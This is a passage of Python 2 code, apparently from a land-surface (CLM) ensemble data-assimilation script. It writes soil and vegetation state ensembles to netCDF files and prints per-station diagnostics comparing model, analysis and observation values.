CLM_Soil_Moisture_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_Ensemble_Mat[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End, :] = NC_File_Out_Block.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
CLM_Soil_Temperature_parm_infl[:, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Ground_Temperature_parm_infl'][:,:]
CLM_Surface_Temperature_parm_infl[Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['CLM_Surface_Temperature_parm_infl'][:,:]
Innovation_State[:,Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index,:,:]
Increments_State[:,Prop_Grid_Array_Sys_Index, Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index,:,:]
Observation[:,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End] = NC_File_Out_Block.variables['Observation'][:,:,:]
NC_File_Out_Block.close()
NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:, Prop_Grid_Array_Sys_Index, :, :] = Analysis_Grid_Array[:, Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index, :, :] = Prop_Grid_Array_Sys_parm_infl[Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Moisture_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, :, :] = CLM_Soil_Moisture_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, :, :, :] = CLM_Soil_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:, :, :] = CLM_Vegetation_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:, :, :] = CLM_Ground_Temperature_Ensemble_Mat
NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, :, :] = CLM_Soil_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:, :] = CLM_Vegetation_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:, :] = CLM_Ground_Temperature_parm_infl
NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][:, :] = CLM_Surface_Temperature_parm_infl
NC_File_Out_Assimilation_2_Diagnostic.variables['Innovation_State'][:,Prop_Grid_Array_Sys_Index, :, :] = Innovation_State[:,Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Diagnostic.variables['Increments_State'][:,Prop_Grid_Array_Sys_Index, :, :] = Increments_State[:,Prop_Grid_Array_Sys_Index, :, :]
NC_File_Out_Assimilation_2_Diagnostic.variables['Observation'][:,:, :] = Observation
del Analysis_Grid_Array,Prop_Grid_Array_Sys_parm_infl,CLM_Soil_Moisture_Ensemble_Mat,CLM_Soil_Moisture_parm_infl
del CLM_Soil_Temperature_Ensemble_Mat,CLM_Vegetation_Temperature_Ensemble_Mat,CLM_Ground_Temperature_Ensemble_Mat
del CLM_Soil_Temperature_parm_infl,CLM_Vegetation_Temperature_parm_infl,CLM_Ground_Temperature_parm_infl
del CLM_Surface_Temperature_parm_infl,Innovation_State,Increments_State,Observation
NC_File_Out_Assimilation_2_Initial.sync()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.sync()
NC_File_Out_Assimilation_2_Diagnostic.close()
#--------------------------------Finish Assimilation
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
Observation_Matrix_Copy = Observation_Matrix[Observation_Matrix_Index,::]
Observation_Matrix_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, Observation_Matrix_Copy)
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid[Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], numpy.mean(NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0))
ObsModel_Mat_Copy = numpy.ma.masked_where(Observation_Matrix_Copy == NAvalue, ObsModel_Mat)
NC_File_Out_Assimilation_2_Initial_Copy.close()
if Def_Print:
print "numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)",numpy.shape(Analysis_Grid_Temp),numpy.shape(Model_State)
print "Min Observation Value is:", Observation_Matrix_Copy.min(), "Maximum Observation Value is:", Observation_Matrix_Copy.max()
print "Min Model_State Value is:", Model_State.min(), "Maximum Model_State Value is:", Model_State.max()
print "Min Analysis_Grid Value is:", Analysis_Grid_Temp.min(), "Maximum Analysis_Grid Value is:", Analysis_Grid_Temp.max()
print "Analysis Mean is:", numpy.mean(Analysis_Grid_Temp), "Model Ensemble Mean is:", numpy.mean(Model_State), "(Analysis - Model_State) Mean is:", numpy.mean(Analysis_Grid_Temp.flatten() - Model_State.flatten())
print "ObsModel_Mat Mean is:", numpy.mean(ObsModel_Mat_Copy),"Observation Mean is:", numpy.mean(Observation_Matrix_Copy), "(ObsModel_Mat - Observation) Mean is:", numpy.mean(ObsModel_Mat.flatten() - Observation_Matrix_Copy.flatten())
if Def_Print != 0:
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
Analysis_Grid_Array = NC_File_Out_Assimilation_2_Diagnostic.variables['Analysis_Grid_Array'][:,:,:,:]
CLM_Soil_Moisture_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
#CLM_Soil_Ice_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
#CLM_2m_Air_Temperature_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_2m_Air_Temperature_Ensemble_Mat'][:,:,:]
#CLM_Snow_Depth_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Snow_Depth_Ensemble_Mat'][:,:,:]
#CLM_Snow_Water_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_Snow_Water_Ensemble_Mat'][:,:,:]
#CLM_ROOTFR_Ensemble_Mat = NC_File_Out_Assimilation_2_Initial.variables['CLM_ROOTFR_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Moisture_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
#CLM_Soil_Ice_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][:,:]
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
CLM_Soil_Moisture_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Moisture_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Temperature_Ensemble_Mat'][:,:,:,:]
#CLM_Soil_Ice_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Ice_Ensemble_Mat'][:,:,:,:]
CLM_Vegetation_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][:,:,:]
CLM_Ground_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Ground_Temperature_Ensemble_Mat'][:,:,:]
#CLM_2m_Air_Temperature_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_2m_Air_Temperature_Ensemble_Mat'][:,:,:]
#CLM_Snow_Depth_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Snow_Depth_Ensemble_Mat'][:,:,:]
#CLM_Snow_Water_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Snow_Water_Ensemble_Mat'][:,:,:]
#CLM_ROOTFR_Ensemble_Mat_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_ROOTFR_Ensemble_Mat'][:,:,:,:]
CLM_Soil_Moisture_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Moisture_parm_infl'][:,:,:]
CLM_Soil_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Soil_Temperature_parm_infl'][:,:,:]
#CLM_Soil_Ice_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Ice_parm_infl'][:,:,:]
CLM_Vegetation_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Vegetation_Temperature_parm_infl'][:,:]
CLM_Ground_Temperature_parm_infl_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['CLM_Ground_Temperature_parm_infl'][:,:]
NC_File_Out_Assimilation_2_Initial_Copy.close()
print "******************************************************** Station Statistics"
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Initial_Copy = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial_Copy, 'r')
for Station_Index in range(numpy.size(Station_XY)/2):
print "Station_"+str(Station_Index+1),"Analysis:",Analysis_Grid_Temp[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Model Value:",Model_State[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"Observation_Value:",Observation_Matrix_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
print "ObsModel_Variance:",ObsModel_Variance_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Prop_Grid_Array_Sys_Index, :, :]
#ObsModel_Mat = numpy.ma.masked_where(ObsModel_Mat == 0, ObsModel_Mat)
print "Ens_Index",Ens_Index,"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans
if Def_Print >= 2:
if Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
for Soil_Layer_Index in range(Soil_Layer_Num):
for Ens_Index in range(Ensemble_Number):
print "Soil_Layer_Index",Soil_Layer_Index,"Ens_Index",Ens_Index,"SysModel:",CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index],\
"Analysis:",CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index]
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "Soil_Layer_Index",Soil_Layer_Index,"Ens_Index",Ens_Index,"SysModel:",CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index],\
"Analysis:",CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],Ens_Index]
if (Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Soil_Moisture"):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
print "Vegetation_Temperature","Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
print "Ground_Temperature","Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Vegetation_Temperature","Model_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "Ground_Temperature","Model_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
elif Variable_Assimilation_Flag[Variable_List.index(SensorVariable_Sub)] and SensorVariable_Sub == "Surface_Temperature":
print "Vegetation_Temperature","Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Vegetation_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
print "Ground_Temperature","Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_Ensemble_Mat[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Ground_Temperature_Ensemble_Mat_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Temperature_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Vegetation_Temperature","Model_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Vegetation_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Vegetation_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "Ground_Temperature","Model_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Ground_Temperature_parm_infl[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Ground_Temperature_parm_infl_Copy[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
for Soil_Layer_Index in range(Soil_Layer_Num):
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Temperature_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
Prop_Grid_Array_H_Trans = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
SysModel_Mat_Ens = Prop_Grid_Array_Sys_Copy[Ens_Index, Variable_List.index("Soil_Moisture"), :, :]
ObsModel_Mat_Ens = Prop_Grid_Array_H_Trans[Ens_Index, Variable_List.index("Surface_Temperature"), :, :]
#ObsModel_Mat = numpy.ma.masked_where(ObsModel_Mat == 0, ObsModel_Mat)
print "Ens_Index",Ens_Index,"SysModel:",SysModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],"ObsModel:",ObsModel_Mat_Ens[Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]],\
"Analysis:",Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]
del Prop_Grid_Array_Sys_Copy,Prop_Grid_Array_H_Trans
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
print "Soil_Layer_Index",Soil_Layer_Index,"Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])-numpy.mean(CLM_Soil_Moisture_Ensemble_Mat_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0],:])
if msw_infl < 0.0:
print "Soil_Layer_Index",Soil_Layer_Index,"Model_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis_parm_infl",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]]),\
"Analysis-Model",numpy.mean(CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])-numpy.mean(CLM_Soil_Moisture_parm_infl_Copy[Soil_Layer_Index,Station_XY_Index[Station_Index][1],Station_XY_Index[Station_Index][0]])
print "******************************************************** Station Statistics"
Prop_Grid_Array_Sys_Copy = NC_File_Out_Assimilation_2_Initial_Copy.variables['Prop_Grid_Array_Sys'][:, :, :, :]
for Ens_Index in range(Ensemble_Number):
Model_State = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Prop_Grid_Array_Sys_Copy[Ens_Index, Prop_Grid_Array_Sys_Index, :, :])
Analysis_Grid_Temp = numpy.ma.masked_where(Mask_Index[Prop_Grid_Array_Sys_Index, ::], Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::])
Analysis_Grid_Temp = numpy.ma.masked_where(Analysis_Grid_Temp == NAvalue, Analysis_Grid_Temp)
print "Min Model:", Model_State.min(), "Max Model:", Model_State.max(), "Min Analysis:", Analysis_Grid_Temp.min(), "Max Analysis:", Analysis_Grid_Temp.max()
#Analysis_Grid[numpy.where(Analysis_Grid[Prop_Grid_Array_Sys_Index,::] == NAvalue)] = CLM_NA
numexpr_a = Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::]
numexpr_b = NAvalue
numexpr_c = numpy.where(numexpr_a == numexpr_b)
NA_Index_Analysis_Grid = numexpr_c
Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::][NA_Index_Analysis_Grid] = numpy.mean(Analysis_Grid_Array[Ens_Index,Prop_Grid_Array_Sys_Index,::][NA_Index_Analysis_Grid])
